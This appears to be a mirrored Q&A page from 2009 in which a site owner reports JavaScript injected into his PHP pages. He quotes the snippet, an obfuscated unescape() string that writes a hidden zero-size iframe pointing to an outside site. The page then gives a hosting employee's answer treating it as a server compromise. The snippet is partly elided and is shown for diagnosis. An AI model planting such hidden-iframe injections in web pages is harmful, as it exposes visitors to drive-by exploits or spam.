Logo Questions Linux Laravel Mysql Ubuntu Git Menu
 

JavaScript being injected in my PHP Pages

I have a website, and I just discovered that somehow someone injected JavaScript on my page. How can I figure out what it does and how they did it?

<script> var x = unescape("%68% (**** some other hex characters here
****%74%2e%63%6e%2f%76%69%64");document.write("<i"+"fr"+"am"+"e 
s"+"r"+"c=\""+x+"/ind"+"e"+"x.p"+"hp\" w"+"id"+"th=\"0\" he"+"i"+"ght=\"0\" 
fr"+"a"+"m"+"ebor"+"de"+"r=\"0\"><"+"/ifra"+"m"+"e>"); </script>

Which I'm not sure how got there. Anyone know how it got there? and what I can do to remove it?

like image 449
thegunner Avatar asked Oct 30 '09 16:10

thegunner


People also ask

Does JavaScript interact with PHP?

JavaScript is used as client side to check and verify client details and PHP is server side used to interact with database. In PHP, HTML is used as a string in the code. In order to render it to the browser, we produce JavaScript code as a string in the PHP code.

Can PHP file contain JavaScript?

You can execute Javascript through PHP by calling javascript code/function as a string in PHP and send it to the client browser to execute.

What does injecting JavaScript mean?

A JavaScript injection attack is a type of attack in which a threat actor injects malicious code directly into the client-side JavasScript. This allows the threat actor to manipulate the website or web application and collect sensitive data, such as personally identifiable information (PII) or payment information.

How inject JavaScript in PHP?

To inject attributes using PHP, locate the place where you want to inject a value, open a PHP tag, echo the variable or value and close the PHP tag. You can inject attributes into HTML, Cascading Style Sheets, or CSS, and even directly into JavaScript code.


1 Answers

You need to know this now:

We see this at Linode quite a bit, and it's an indication that your server has been compromised by an attacker. When unescaped, it's likely to be a browser exploit that will infect your users, or a link to a spam site.

Save everything with the injected code for later analysis, and redeploy your entire server and Web stack immediately. The attacker undoubtedly has at least a shell on your box, and that will inevitably lead to root if he's crafty.

Redeploy now, keep your applications up to date, stop writing exploitable PHP, and lock down your user accounts with strong passwords or SSH keys. Not trying to pimp my company or anything, but this is such a common occurrence on poorly-managed Web boxen that we've written an article about how to completely redeploy from scratch. I suggest it several times a day.

EDIT: If you're downvoting me, please say why -- I've triaged three cases with this exact code, so I'm not making things up.

EDIT 2: There is one regard where I may be overestimating the situation, and it's only because I'm an employee of a VPS company (and I see this a lot). I made a mistake in assuming that this user's "Web host" was a server under his control, not shared hosting. That was a mistake, but there still is the chance that I'm right.

Compromise is a desperate situation where working in the dark can have disastrous consequences. If you do not know why an unauthorized party gained access to your infrastructure, you cannot rectify the problem. Since everyone assumed we're talking about managed, shared hosting here -- there is the chance that you're right and XSS is to blame. Again, the question was not presented with much data, and compromise is a situation that is not treated with enough gravity among developers in general.

I'm honestly tired of tickets that we open where a box is hitting another on the Internet with SSH probes, DoS data, URL injection, or anything for that matter -- and the Rails or PHP developer administering the box has no idea why it happened or what he can do about it. These are all things that indicate system compromise, not XSS. Therefore, my assumption that this was a server under the OP's control was misplaced, but it's forgivable (I hope) because I'm at work right now, handling those tickets.

If you'd like me to delete my answer, just say so, but I don't see any others getting votes.

like image 117
Jed Smith Avatar answered Oct 12 '22 23:10

Jed Smith